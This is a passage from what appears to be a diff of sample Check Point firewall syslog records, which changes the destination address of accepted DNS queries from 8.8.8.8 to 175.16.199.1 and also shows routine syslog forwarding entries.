rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44282"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:53:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d276,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T16:53:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d276,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500790"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27e,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500798"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32809"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500799"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46818"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500799"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43579"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d280,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500800"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47669"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d288,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500808"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46309"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d289,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500809"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46114"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d289,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500809"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34166"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d28a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500810"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d292,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500818"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51988"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d293,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500819"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33882"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d293,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500819"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d294,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500820"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47300"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d276,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500790"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27e,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500798"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32809"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500799"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46818"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500799"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43579"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d280,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500800"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47669"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d288,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500808"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46309"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d289,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500809"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46114"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d289,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500809"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34166"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d28a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500810"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d292,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500818"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51988"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d293,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500819"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33882"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d293,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500819"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d294,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500820"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47300"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:53:41Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d295,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T16:53:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500828"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58832"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500829"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
